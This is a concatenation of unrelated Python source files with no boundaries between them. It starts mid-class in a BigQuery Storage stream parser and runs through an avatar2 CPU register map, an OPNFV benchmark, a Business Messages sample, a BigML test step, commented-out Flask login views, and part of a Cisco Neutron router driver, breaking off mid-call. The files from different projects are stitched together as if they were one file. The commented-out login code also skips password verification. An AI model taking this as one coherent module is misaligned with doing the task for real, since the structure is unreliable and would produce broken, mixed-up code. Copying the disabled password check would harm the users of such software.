    def __iter__(self):
        """A ``ReadRowsPage`` is an iterator."""
        return self

    def next(self):
        """Get the next row in the page."""
        self._parse_rows()
        if self._remaining:
            self._remaining -= 1
        return next(self._iter_rows)

    # Alias needed for Python 2/3 support.
    __next__ = next

    def to_arrow(self):
        """Create an :class:`pyarrow.RecordBatch` of rows in the page.

        Returns:
            pyarrow.RecordBatch:
                Rows from the message, as an Arrow record batch.
        """
        return self._stream_parser.to_arrow(self._message)

    def to_dataframe(self, dtypes=None):
        """Create a :class:`pandas.DataFrame` of rows in the page.

        This method requires the pandas library to create a data frame and the
        fastavro library to parse row messages.

        .. warning::
            DATETIME columns are not supported. They are currently parsed as
            strings in the fastavro library.

        Args:
            dtypes ( \
                Map[str, Union[str, pandas.Series.dtype]] \
            ):
                Optional. A dictionary of column names pandas ``dtype``s. The
                provided ``dtype`` is used when constructing the series for
                the column specified. Otherwise, the default pandas behavior
                is used.

        Returns:
            pandas.DataFrame:
                A data frame of all rows in the stream.
        """
        if pandas is None:
            raise ImportError(_PANDAS_REQUIRED)

        return self._stream_parser.to_dataframe(self._message, dtypes=dtypes)


class _StreamParser(object):
    """Abstract base for helpers that decode stream messages for one schema."""

    def to_arrow(self, message):
        raise NotImplementedError("Not implemented.")

    def to_dataframe(self, message, dtypes=None):
        raise NotImplementedError("Not implemented.")

    def to_rows(self, message):
        raise NotImplementedError("Not implemented.")

    def _parse_avro_schema(self):
        raise NotImplementedError("Not implemented.")

    def _parse_arrow_schema(self):
        raise NotImplementedError("Not implemented.")

    @staticmethod
    def from_read_session(read_session):
        """Select a parser implementation from the session's schema oneof."""
        schema_type = read_session._pb.WhichOneof("schema")
        if schema_type == "avro_schema":
            return _AvroStreamParser(read_session)
        if schema_type == "arrow_schema":
            return _ArrowStreamParser(read_session)
        raise TypeError(
            "Unsupported schema type in read_session: {0}".format(schema_type)
        )

    @staticmethod
    def from_read_rows_response(message):
        """Select a parser implementation from the message's schema oneof."""
        schema_type = message._pb.WhichOneof("schema")
        if schema_type == "avro_schema":
            return _AvroStreamParser(message)
        if schema_type == "arrow_schema":
            return _ArrowStreamParser(message)
        raise TypeError(
            "Unsupported schema type in message: {0}".format(schema_type)
        )


class _AvroStreamParser(_StreamParser):
    """Helper to parse Avro messages into useful representations."""

    def __init__(self, message):
        """Construct an _AvroStreamParser.

        Args:
            message (Union[
                google.cloud.bigquery_storage_v1.types.ReadSession, \
                google.cloud.bigquery_storage_v1.types.ReadRowsResponse, \
            ]):
                Either the first message of data from a read rows stream or a
                read session. Both types contain a oneof "schema" field, which
                can be used to determine how to deserialize rows.
        """
        if fastavro is None:
            raise ImportError(_FASTAVRO_REQUIRED)

        self._first_message = message
        # Parsed lazily and cached on first use.
        self._avro_schema_json = None
        self._fastavro_schema = None
        self._column_names = None

    def to_arrow(self, message):
        """Unsupported for Avro streams; always raises.

        Args:
            message (google.cloud.bigquery_storage_v1.types.ReadRowsResponse):
                Protocol buffer from the read rows stream, to convert into an
                Arrow record batch.

        Raises:
            NotImplementedError: Arrow conversion requires an Arrow stream.
        """
        raise NotImplementedError("to_arrow not implemented for Avro streams.")

    def to_dataframe(self, message, dtypes=None):
        """Create a :class:`pandas.DataFrame` of rows in the page.

        This method requires the pandas library to create a data frame and the
        fastavro library to parse row messages.

        .. warning::
            DATETIME columns are not supported. They are currently parsed as
            strings in the fastavro library.

        Args:
            message ( \
                ~google.cloud.bigquery_storage_v1.types.ReadRowsResponse \
            ):
                A message containing Avro bytes to parse into a pandas DataFrame.
            dtypes ( \
                Map[str, Union[str, pandas.Series.dtype]] \
            ):
                Optional. A dictionary of column names pandas ``dtype``s. The
                provided ``dtype`` is used when constructing the series for
                the column specified. Otherwise, the default pandas behavior
                is used.

        Returns:
            pandas.DataFrame:
                A data frame of all rows in the stream.
        """
        self._parse_avro_schema()

        if dtypes is None:
            dtypes = {}

        # Gather values column-wise, then let pandas assemble the frame in
        # the schema's column order.
        columns = collections.defaultdict(list)
        for row in self.to_rows(message):
            for name, value in row.items():
                columns[name].append(value)
        for name in dtypes:
            columns[name] = pandas.Series(columns[name], dtype=dtypes[name])
        return pandas.DataFrame(columns, columns=self._column_names)

    def _parse_avro_schema(self):
        """Extract and parse Avro schema from a read session (once only)."""
        if self._avro_schema_json:
            return

        self._avro_schema_json = json.loads(self._first_message.avro_schema.schema)
        self._column_names = tuple(
            field["name"] for field in self._avro_schema_json["fields"]
        )
        # The schema is cached, so the original message can be released.
        self._first_message = None

    def _parse_fastavro(self):
        """Convert parsed Avro schema to fastavro format."""
        self._parse_avro_schema()
        self._fastavro_schema = fastavro.parse_schema(self._avro_schema_json)

    def to_rows(self, message):
        """Parse all rows in a stream message.

        Args:
            message ( \
                ~google.cloud.bigquery_storage_v1.types.ReadRowsResponse \
            ):
                A message containing Avro bytes to parse into rows.

        Returns:
            Iterable[Mapping]:
                A sequence of rows, represented as dictionaries.
        """
        self._parse_fastavro()
        stream = io.BytesIO(message.avro_rows.serialized_binary_rows)
        # schemaless_reader decodes exactly one record per call, so keep
        # calling it until the buffer is exhausted.
        while True:
            try:
                # TODO: Parse DATETIME into datetime.datetime (no timezone),
                #       instead of as a string.
                yield fastavro.schemaless_reader(stream, self._fastavro_schema)
            except StopIteration:
                break  # Finished with message


class _ArrowStreamParser(_StreamParser):
    """Helper to parse Arrow messages into useful representations."""

    def __init__(self, message):
        """Construct an _ArrowStreamParser.

        Args:
            message (Union[
                google.cloud.bigquery_storage_v1.types.ReadSession, \
                google.cloud.bigquery_storage_v1.types.ReadRowsResponse, \
            ]):
                Either the first message of data from a read rows stream or a
                read session. Both types contain a oneof "schema" field, which
                can be used to determine how to deserialize rows.
        """
        if pyarrow is None:
            raise ImportError(_PYARROW_REQUIRED)

        self._first_message = message
        # Parsed lazily from the first message / session.
        self._schema = None

    def to_arrow(self, message):
        """Return the rows of *message* as a :class:`pyarrow.RecordBatch`."""
        return self._parse_arrow_message(message)

    def to_rows(self, message):
        """Yield each row of *message* as a dict keyed by column name."""
        record_batch = self._parse_arrow_message(message)

        # Walk all columns in lockstep to reassemble each row as a mapping.
        for values in zip(*record_batch.columns):
            yield dict(zip(self._column_names, values))

    def to_dataframe(self, message, dtypes=None):
        """Return the rows of *message* as a :class:`pandas.DataFrame`.

        Columns listed in ``dtypes`` are rebuilt with the requested dtype;
        all others keep the default pandas conversion.
        """
        if dtypes is None:
            dtypes = {}

        frame = self._parse_arrow_message(message).to_pandas()

        for column, dtype in dtypes.items():
            frame[column] = pandas.Series(frame[column], dtype=dtype)

        return frame

    def _parse_arrow_message(self, message):
        """Deserialize one record batch, parsing the schema first if needed."""
        self._parse_arrow_schema()

        serialized = message.arrow_record_batch.serialized_record_batch
        return pyarrow.ipc.read_record_batch(
            pyarrow.py_buffer(serialized),
            self._schema,
        )

    def _parse_arrow_schema(self):
        """Read and cache the Arrow schema from the first message (once)."""
        if self._schema:
            return

        self._schema = pyarrow.ipc.read_schema(
            pyarrow.py_buffer(self._first_message.arrow_schema.serialized_schema)
        )
        self._column_names = [field.name for field in self._schema]
        # The schema is cached, so the original message can be released.
        self._first_message = None

from capstone import *

from .architecture import Architecture

from avatar2.installer.config import GDB_X86, OPENOCD

class X86(Architecture):
    """32-bit x86 architecture description (register map, capstone config)."""

    get_gdb_executable = Architecture.resolve(GDB_X86)
    get_oocd_executable = Architecture.resolve(OPENOCD)

    qemu_name = 'i386'
    gdb_name = 'i386'

    # GDB remote-protocol register numbers; note 'pc' aliases 'eip'.
    registers = {'eax': 0,
                 'ecx': 1,
                 'edx': 2,
                 'ebx': 3,
                 'esp': 4,
                 'ebp': 5,
                 'esi': 6,
                 'edi': 7,
                 'eip': 8,
                 'pc': 8,
                 'eflags': 9,
                 'cs': 10,
                 'ss': 11,
                 'ds': 12,
                 'es': 13,
                 'fs': 14,
                 'gs': 15, }

    # SSE (xmm0-15) and AVX (ymm0-15) registers are read through GDB
    # expressions; the per-register entries only differ in the index, so
    # generate them instead of spelling out all 32 dictionaries.
    special_registers = {
        **{
            'xmm{}'.format(n): {
                'format': '{{{:d}, {:d}, {:d}, {:d}}}',
                'gdb_expression': '$xmm{}.v4_int32'.format(n),
            }
            for n in range(16)
        },
        **{
            'ymm{}'.format(n): {
                'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}',
                'gdb_expression': '$ymm{}.v8_int32'.format(n),
            }
            for n in range(16)
        },
    }

    sr_name = 'eflags'
    unemulated_instructions = []
    capstone_arch = CS_ARCH_X86
    capstone_mode = CS_MODE_32
    word_size = 32


class X86_64(X86):
    """64-bit variant of :class:`X86`; inherits the SSE/AVX special registers."""

    qemu_name = 'x86_64'
    gdb_name = 'i386:x86-64'
    # GDB remote-protocol register numbers; note 'pc' aliases 'rip'.
    registers = {'rax': 0,
                 'rbx': 1,
                 'rcx': 2,
                 'rdx': 3,
                 'rsi': 4,
                 'rdi': 5,
                 'rbp': 6,
                 'rsp': 7,
                 'r8': 8,
                 'r9': 9,
                 'r10': 10,
                 'r11': 11,
                 'r12': 12,
                 'r13': 13,
                 'r14': 14,
                 'r15': 15,
                 'rip': 16,
                 'pc': 16,
                 'eflags': 17,
                 'cs': 18,
                 'ss': 19,
                 'ds': 20,
                 'es': 21,
                 'fs': 22,
                 'gs': 23,
                 }
    unemulated_instructions = []
    # NOTE: the original assigned capstone_mode twice; one assignment suffices.
    capstone_mode = CS_MODE_64
    word_size = 64

# Copyright (c) 2015 Intel Research and Development Ireland Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.


import instantiation_validation_benchmark as base
from experimental_framework import common


NUM_OF_NEIGHBORS = 'num_of_neighbours'
AMOUNT_OF_RAM = 'amount_of_ram'
NUMBER_OF_CORES = 'number_of_cores'
NETWORK_NAME = 'network'
SUBNET_NAME = 'subnet'


class InstantiationValidationNoisyNeighborsBenchmark(
        base.InstantiationValidationBenchmark):
    """Instantiation validation benchmark run while noisy-neighbor stacks
    generate load next to the instance under test."""

    def __init__(self, name, params):
        base.InstantiationValidationBenchmark.__init__(self, name, params)

        # The Liberty release needs its own Heat workload template.
        if common.RELEASE == 'liberty':
            temp_name = 'stress_workload_liberty.yaml'
        else:
            temp_name = 'stress_workload.yaml'

        self.template_file = common.get_template_dir() + \
            temp_name
        self.stack_name = 'neighbour'
        self.neighbor_stack_names = list()

    def get_features(self):
        """Describe supported parameters, their allowed values and defaults."""
        features = super(InstantiationValidationNoisyNeighborsBenchmark,
                         self).get_features()
        features['description'] = 'Instantiation Validation Benchmark ' \
                                  'with noisy neghbors'
        features['parameters'].append(NUM_OF_NEIGHBORS)
        features['parameters'].append(AMOUNT_OF_RAM)
        features['parameters'].append(NUMBER_OF_CORES)
        features['parameters'].append(NETWORK_NAME)
        features['parameters'].append(SUBNET_NAME)
        features['allowed_values'][NUM_OF_NEIGHBORS] = \
            ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10']
        features['allowed_values'][NUMBER_OF_CORES] = \
            ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10']
        features['allowed_values'][AMOUNT_OF_RAM] = \
            ['256M', '1G', '2G', '3G', '4G', '5G', '6G', '7G', '8G', '9G',
             '10G']
        features['default_values'][NUM_OF_NEIGHBORS] = '1'
        features['default_values'][NUMBER_OF_CORES] = '1'
        features['default_values'][AMOUNT_OF_RAM] = '256M'
        features['default_values'][NETWORK_NAME] = ''
        features['default_values'][SUBNET_NAME] = ''
        return features

    def init(self):
        """Point the lua collector at the results file and deploy the
        noisy-neighbor Heat stacks."""
        super(InstantiationValidationNoisyNeighborsBenchmark, self).init()
        common.replace_in_file(self.lua_file, 'local out_file = ""',
                               'local out_file = "' +
                               self.results_file + '"')
        heat_param = dict()
        heat_param['network'] = self.params[NETWORK_NAME]
        heat_param['subnet'] = self.params[SUBNET_NAME]
        # Use the module-level parameter-name constants, consistent with
        # get_features() (previously these lookups hard-coded the strings).
        heat_param['cores'] = self.params[NUMBER_OF_CORES]
        heat_param['memory'] = self.params[AMOUNT_OF_RAM]
        for i in range(0, int(self.params[NUM_OF_NEIGHBORS])):
            stack_name = self.stack_name + str(i)
            common.DEPLOYMENT_UNIT.deploy_heat_template(self.template_file,
                                                        stack_name,
                                                        heat_param)
            self.neighbor_stack_names.append(stack_name)

    def finalize(self):
        """Undo the lua-file edit and tear down all neighbor stacks."""
        common.replace_in_file(self.lua_file, 'local out_file = "' +
                               self.results_file + '"',
                               'local out_file = ""')
        # destroy neighbor stacks
        for stack_name in self.neighbor_stack_names:
            common.DEPLOYMENT_UNIT.destroy_heat_template(stack_name)
        self.neighbor_stack_names = list()

## Copyright 2022 Google LLC
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
##     https://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.

"""Sends a text mesage to the user with a suggestion action to dial a phone number.

Read more: https://developers.google.com/business-communications/business-messages/guides/how-to/message/send?hl=en#dial_action

This code is based on the https://github.com/google-business-communications/python-businessmessages
Python Business Messages client library.
"""

import uuid

from businessmessages import businessmessages_v1_client as bm_client
from businessmessages.businessmessages_v1_messages import BusinessmessagesConversationsMessagesCreateRequest
from businessmessages.businessmessages_v1_messages import BusinessMessagesDialAction
from businessmessages.businessmessages_v1_messages import BusinessMessagesMessage
from businessmessages.businessmessages_v1_messages import BusinessMessagesRepresentative
from businessmessages.businessmessages_v1_messages import BusinessMessagesSuggestedAction
from businessmessages.businessmessages_v1_messages import BusinessMessagesSuggestion
from oauth2client.service_account import ServiceAccountCredentials

# Edit the values below:
path_to_service_account_key = './service_account_key.json'
conversation_id = 'EDIT_HERE'

# Authenticate as the agent with its service account key, scoped to the
# Business Messages API.
credentials = ServiceAccountCredentials.from_json_keyfile_name(
    path_to_service_account_key,
    scopes=['https://www.googleapis.com/auth/businessmessages'])

client = bm_client.BusinessmessagesV1(credentials=credentials)

# A message is attributed to either a BOT or a HUMAN representative.
representative_type_as_string = 'BOT'
if representative_type_as_string == 'BOT':
  representative_type = BusinessMessagesRepresentative.RepresentativeTypeValueValuesEnum.BOT
else:
  representative_type = BusinessMessagesRepresentative.RepresentativeTypeValueValuesEnum.HUMAN

# Create a text message with a dial action and fallback text.
# The fallback is shown on surfaces that cannot render the suggestion chip;
# messageId must be unique per message, hence the random UUID.
message = BusinessMessagesMessage(
    messageId=str(uuid.uuid4().int),
    representative=BusinessMessagesRepresentative(
        representativeType=representative_type
    ),
    text='Contact support for help with this issue.',
    fallback='Give us a call at +12223334444.',
    suggestions=[
        BusinessMessagesSuggestion(
            action=BusinessMessagesSuggestedAction(
                text='Call support',
                postbackData='call-support',
                dialAction=BusinessMessagesDialAction(
                    phoneNumber='+12223334444'))
            ),
        ])

# Create the message request, addressed to the existing conversation.
create_request = BusinessmessagesConversationsMessagesCreateRequest(
    businessMessagesMessage=message,
    parent='conversations/' + conversation_id)

# Send the message
bm_client.BusinessmessagesV1.ConversationsMessagesService(
    client=client).Create(request=create_request)

# -*- coding: utf-8 -*-
#!/usr/bin/env python
#
# Copyright 2014 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from world import world
from bigml.api import HTTP_OK

def i_get_the_project(step, resource):
    """Retrieve the project *resource* and stash it on the shared ``world``."""
    response = world.api.get_project(resource)
    world.status = response['code']
    assert world.status == HTTP_OK
    world.project = response['object']

# automate/server/user/views.py


#################
#### imports ####
#################

#from flask import render_template, Blueprint, url_for, \
#    redirect, flash, request
#from flask_login import login_user, logout_user, login_required

#from automate.server import bcrypt, db
#from automate.server import db
#from automate.server.models import User
#from automate.server.user.forms import LoginForm, RegisterForm

################
#### config ####
################

#user_blueprint = Blueprint('user', __name__,)


################
#### routes ####
################

#@user_blueprint.route('/register', methods=['GET', 'POST'])
#def register():
#    form = RegisterForm(request.form)
#    if form.validate_on_submit():
#        user = User(
#            email=form.email.data,
#            password=form.password.data
#        )
#        db.session.add(user)
#        db.session.commit()
#
#        login_user(user)
#
#        flash('Thank you for registering.', 'success')
#        return redirect(url_for("user.members"))
#
#    return render_template('user/register.html', form=form)
#
#
#@user_blueprint.route('/login', methods=['GET', 'POST'])
#def login():
#    form = LoginForm(request.form)
#    if form.validate_on_submit():
#        user = User.query.filter_by(email=form.email.data).first()
#        if user:
#        #if user and bcrypt.check_password_hash(
#        #        user.password, request.form['password']):
#        #    login_user(user)
#            flash('You are logged in. Welcome!', 'success')
#            return redirect(url_for('user.members'))
#        else:
#            flash('Invalid email and/or password.', 'danger')
#            return render_template('user/login.html', form=form)
#    return render_template('user/login.html', title='Please Login', form=form)
#
#
#@user_blueprint.route('/logout')
#@login_required
#def logout():
#    logout_user()
#    flash('You were logged out. Bye!', 'success')
#    return redirect(url_for('main.home'))
#
#
#@user_blueprint.route('/members')
#@login_required
#def members():
#    return render_template('user/members.html')
#
# Copyright 2015 Cisco Systems, Inc.  All rights reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import uuidutils
from sqlalchemy.orm import exc
from sqlalchemy.sql import expression as expr

from neutron.db import models_v2
from neutron.extensions import l3

from neutron_lib import constants as l3_constants
from neutron_lib import exceptions as n_exc

from networking_cisco._i18n import _, _LW
from networking_cisco import backwards_compatibility as bc
from networking_cisco.plugins.cisco.common import cisco_constants
from networking_cisco.plugins.cisco.db.l3 import ha_db
from networking_cisco.plugins.cisco.db.l3 import l3_models
from networking_cisco.plugins.cisco.db.l3.l3_router_appliance_db import (
    L3RouterApplianceDBMixin)
from networking_cisco.plugins.cisco.extensions import routerhostingdevice
from networking_cisco.plugins.cisco.extensions import routerrole
from networking_cisco.plugins.cisco.extensions import routertype
from networking_cisco.plugins.cisco.extensions import routertypeawarescheduler
from networking_cisco.plugins.cisco.l3 import drivers


LOG = logging.getLogger(__name__)


# Short local aliases for constants defined in other modules but used
# frequently throughout this one.
DEVICE_OWNER_GLOBAL_ROUTER_GW = cisco_constants.DEVICE_OWNER_GLOBAL_ROUTER_GW
HOSTING_DEVICE_ATTR = routerhostingdevice.HOSTING_DEVICE_ATTR
ROUTER_ROLE_GLOBAL = cisco_constants.ROUTER_ROLE_GLOBAL
ROUTER_ROLE_LOGICAL_GLOBAL = cisco_constants.ROUTER_ROLE_LOGICAL_GLOBAL
ROUTER_ROLE_HA_REDUNDANCY = cisco_constants.ROUTER_ROLE_HA_REDUNDANCY

# Range and offset used when deriving HSRP group ids (see
# generate_ha_group_id()).  NOTE(review): tenant and external values are
# currently identical -- presumably kept separate for independent tuning;
# confirm before collapsing them.
TENANT_HSRP_GRP_RANGE = 1
TENANT_HSRP_GRP_OFFSET = 1064
EXT_HSRP_GRP_RANGE = 1
EXT_HSRP_GRP_OFFSET = 1064

# Neutron router instances are named '<N_ROUTER_PREFIX><router uuid>';
# DEV_NAME_LEN bounds how much of that name generate_ha_group_id() consumes.
N_ROUTER_PREFIX = 'nrouter-'
DEV_NAME_LEN = 14


class TopologyNotSupportedByRouterError(n_exc.Conflict):
    """Raised (HTTP 409) when a router cannot realize the requested topology."""
    message = _("Requested topology cannot be supported by router.")


class ASR1kL3RouterDriver(drivers.L3RouterBaseDriver):
    """L3 router type driver for Cisco ASR1k hosting devices.

    In addition to regular tenant routers this driver maintains two kinds of
    auxiliary Neutron routers:

    * one "global" router per hosting device, which runs outside any VRF and
      provides external connectivity for the tenant routers hosted on that
      device, and
    * a single, never-hosted "logical global" router that only exists to
      carry the HA settings and VIPs shared by the global routers.

    Global routers are created/removed as tenant routers gain or lose
    external gateways; the periodic backlog processing cleans up any global
    routers that have become orphaned.
    """

    def create_router_precommit(self, context, router_context):
        pass

    def create_router_postcommit(self, context, router_context):
        pass

    def update_router_precommit(self, context, router_context):
        pass

    def update_router_postcommit(self, context, router_context):
        # Whenever a gateway is added to, or removed from, a router hosted on
        # a hosting device, we must ensure that a global router is running
        # (for add operation) or not running (for remove operation) on that
        # hosting device.
        current = router_context.current
        if current[HOSTING_DEVICE_ATTR] is None:
            return
        e_context = context.elevated()
        if current['gw_port_id']:
            self._conditionally_add_global_router(e_context, current)
        else:
            # Gateway was removed; the *original* router still carries the
            # external gateway info needed to locate the global router.
            self._conditionally_remove_global_router(
                e_context, router_context.original, True)

    def delete_router_precommit(self, context, router_context):
        pass

    def delete_router_postcommit(self, context, router_context):
        pass

    def schedule_router_precommit(self, context, router_context):
        pass

    def schedule_router_postcommit(self, context, router_context):
        # When the hosting device hosts a Neutron router with external
        # connectivity, a "global" router (modeled as a Neutron router) must
        # also run on the hosting device (outside of any VRF) to enable the
        # connectivity.
        current = router_context.current
        if current['gw_port_id'] and current[HOSTING_DEVICE_ATTR] is not None:
            self._conditionally_add_global_router(context.elevated(), current)

    def unschedule_router_precommit(self, context, router_context):
        pass

    def unschedule_router_postcommit(self, context, router_context):
        # When there is no longer any router with external gateway hosted on
        # a hosting device, the global router on that hosting device can also
        # be removed.
        current = router_context.current
        hd_id = current[HOSTING_DEVICE_ATTR]
        if current['gw_port_id'] and hd_id is not None:
            self._conditionally_remove_global_router(context.elevated(),
                                                     current)

    def add_router_interface_precommit(self, context, r_port_context):
        # Inside an ASR1k, VLAN sub-interfaces are used to connect to internal
        # neutron networks. Only one such sub-interface can be created for each
        # VLAN. As the VLAN sub-interface is added to the VRF representing the
        # Neutron router, we must only allow one Neutron router to attach to a
        # particular Neutron subnet/network.
        if (r_port_context.router_context.current[routerrole.ROUTER_ROLE_ATTR]
                == ROUTER_ROLE_HA_REDUNDANCY):
            # redundancy routers can be exempt as we check the user visible
            # routers and the request will be rejected there.
            return
        e_context = context.elevated()
        if r_port_context.current is None:
            # Interface specified by subnet; resolve its network.
            sn = self._core_plugin.get_subnet(e_context,
                                              r_port_context.current_subnet_id)
            net_id = sn['network_id']
        else:
            net_id = r_port_context.current['network_id']
        filters = {'network_id': [net_id],
                   'device_owner': [bc.constants.DEVICE_OWNER_ROUTER_INTF]}
        for port in self._core_plugin.get_ports(e_context,
                                                filters=filters):
            router_id = port['device_id']
            if router_id is None:
                continue
            router = self._l3_plugin.get_router(e_context, router_id)
            # A user-visible (role-less) router already attached to this
            # network means a second attachment is not supported.
            if router[routerrole.ROUTER_ROLE_ATTR] is None:
                raise TopologyNotSupportedByRouterError()

    def add_router_interface_postcommit(self, context, r_port_context):
        pass

    def remove_router_interface_precommit(self, context, r_port_context):
        pass

    def remove_router_interface_postcommit(self, context, r_port_context):
        pass

    def create_floatingip_precommit(self, context, fip_context):
        pass

    def create_floatingip_postcommit(self, context, fip_context):
        pass

    def update_floatingip_precommit(self, context, fip_context):
        pass

    def update_floatingip_postcommit(self, context, fip_context):
        pass

    def delete_floatingip_precommit(self, context, fip_context):
        pass

    def delete_floatingip_postcommit(self, context, fip_context):
        pass

    def ha_interface_ip_address_needed(self, context, router, port,
                                       ha_settings_db, ha_group_uuid):
        """Return False for gateway ports (they use VIPs), True otherwise."""
        if port['device_owner'] == bc.constants.DEVICE_OWNER_ROUTER_GW:
            return False
        else:
            return True

    def generate_ha_group_id(self, context, router, port, ha_settings_db,
                             ha_group_uuid):
        """Derive a deterministic HSRP group id for *port* on *router*."""
        if port['device_owner'] in {bc.constants.DEVICE_OWNER_ROUTER_GW,
                                    DEVICE_OWNER_GLOBAL_ROUTER_GW}:
            # Use hex digits of the router uuid embedded in the router's
            # instance name (after the 'nrouter-' prefix).
            ri_name = self._router_name(router['id'])[8:DEV_NAME_LEN]
            group_id = int(ri_name, 16) % TENANT_HSRP_GRP_RANGE
            group_id += TENANT_HSRP_GRP_OFFSET
            return group_id
        else:
            # Use leading hex digits of the network uuid.
            net_id_digits = port['network_id'][:6]
            group_id = int(net_id_digits, 16) % EXT_HSRP_GRP_RANGE
            group_id += EXT_HSRP_GRP_OFFSET
            return group_id

    def pre_backlog_processing(self, context):
        """Delete global routers that no longer serve any gateway routers."""
        filters = {routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_GLOBAL]}
        global_routers = self._l3_plugin.get_routers(context, filters=filters)
        if not global_routers:
            LOG.debug("There are no global routers")
            return
        for gr in global_routers:
            filters = {
                HOSTING_DEVICE_ATTR: [gr[HOSTING_DEVICE_ATTR]],
                routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_HA_REDUNDANCY, None]
            }
            invert_filters = {'gw_port_id': [None]}
            num_rtrs = self._l3_plugin.get_routers_count_extended(
                context, filters=filters, invert_filters=invert_filters)
            LOG.debug("Global router %(name)s[%(id)s] with hosting_device "
                      "%(hd)s has %(num)d routers with gw_port set on that "
                      "device",
                      {'name': gr['name'], 'id': gr['id'],
                       'hd': gr[HOSTING_DEVICE_ATTR], 'num': num_rtrs, })
            if num_rtrs == 0:
                LOG.warning(
                    _LW("Global router:%(name)s[id:%(id)s] is present for "
                        "hosting device:%(hd)s but there are no tenant or "
                        "redundancy routers with gateway set on that hosting "
                        "device. Proceeding to delete global router."),
                    {'name': gr['name'], 'id': gr['id'],
                     'hd': gr[HOSTING_DEVICE_ATTR]})
                self._delete_global_router(context, gr['id'])
                filters = {
                    #TODO(bmelande): Filter on routertype of global router
                    #routertype.TYPE_ATTR: [routertype_id],
                    routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_LOGICAL_GLOBAL]}
                log_global_routers = self._l3_plugin.get_routers(
                    context, filters=filters)
                if log_global_routers:
                    log_global_router_id = log_global_routers[0]['id']
                    self._delete_global_router(context, log_global_router_id,
                                               logical=True)

    def post_backlog_processing(self, context):
        pass

    # ---------------- Create workflow functions -----------------

    def _conditionally_add_global_router(self, context, tenant_router):
        # We could filter on hosting device id but we don't so we get all
        # global routers for this router type. We can then use that count to
        # determine which ha priority a new global router should get.
        filters = {
            routertype.TYPE_ATTR: [tenant_router[routertype.TYPE_ATTR]],
            routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_GLOBAL]}
        global_routers = self._l3_plugin.get_routers(
            context, filters=filters)
        hd_to_gr_dict = {r[HOSTING_DEVICE_ATTR]: r for r in global_routers}
        hosting_device_id = tenant_router[HOSTING_DEVICE_ATTR]
        ext_nw_id = tenant_router[l3.EXTERNAL_GW_INFO]['network_id']
        global_router = hd_to_gr_dict.get(hosting_device_id)
        logical_global_router = self._get_logical_global_router(context,
                                                                tenant_router)
        self._conditionally_add_auxiliary_external_gateway_port(
            context, logical_global_router, ext_nw_id, tenant_router, True)
        if global_router is None:
            # must create global router on hosting device
            global_router = self._create_global_router(
                context, hosting_device_id, hd_to_gr_dict, tenant_router,
                logical_global_router)
        self._conditionally_add_auxiliary_external_gateway_port(
            context, global_router, ext_nw_id, tenant_router)
        self._l3_plugin.add_type_and_hosting_device_info(context,
                                                         global_router)
        for ni in self._l3_plugin.get_notifiers(context, [global_router]):
            if ni['notifier']:
                ni['notifier'].routers_updated(context, ni['routers'])

    def _conditionally_add_auxiliary_external_gateway_port(
            self, context, global_router, ext_net_id, tenant_router,
            provision_ha=False, port_type=DEVICE_OWNER_GLOBAL_ROUTER_GW):
        # the global router may or may not have an interface on the
        # external network that the tenant router uses
        filters = {
            'device_id': [global_router['id']],
            'device_owner': [port_type]}
        connected_nets = {
            p['network_id']: p['fixed_ips'] for p in
            self._core_plugin.get_ports(context, filters=filters)}
        if ext_net_id in connected_nets:
            # already connected to the external network so we're done
            return
        else:
            # not connected to the external network, so let's fix that
            aux_gw_port = self._create_auxiliary_external_gateway_port(
                context, global_router, ext_net_id, tenant_router, port_type)
            if provision_ha:
                self._provision_port_ha(context, aux_gw_port, global_router)

    def _create_auxiliary_external_gateway_port(
            self, context, global_router, ext_net_id, tenant_router,
            port_type=DEVICE_OWNER_GLOBAL_ROUTER_GW):
        # When a global router is connected to an external network then a
        # special type of gateway port is created on that network. Such a
        # port is called auxiliary gateway ports. It has an ip address on
        # each subnet of the external network. A (logical) global router
        # never has a traditional Neutron gateway port.
        filters = {
            'device_id': [tenant_router['id']],
            'device_owner': [l3_constants.DEVICE_OWNER_ROUTER_GW]}
        # fetch the gateway port of the *tenant* router so we can determine
        # the CIDR of that port's subnet
        gw_port = self._core_plugin.get_ports(context,
                                              filters=filters)[0]
        fixed_ips = self._get_fixed_ips_subnets(context, gw_port)
        global_router_id = global_router['id']
        with context.session.begin(subtransactions=True):
            aux_gw_port = self._core_plugin.create_port(context, {
                'port': {
                    'tenant_id': '',  # intentionally not set
                    'network_id': ext_net_id,
                    'mac_address': bc.constants.ATTR_NOT_SPECIFIED,
                    'fixed_ips': fixed_ips,
                    'device_id': global_router_id,
                    'device_owner': port_type,
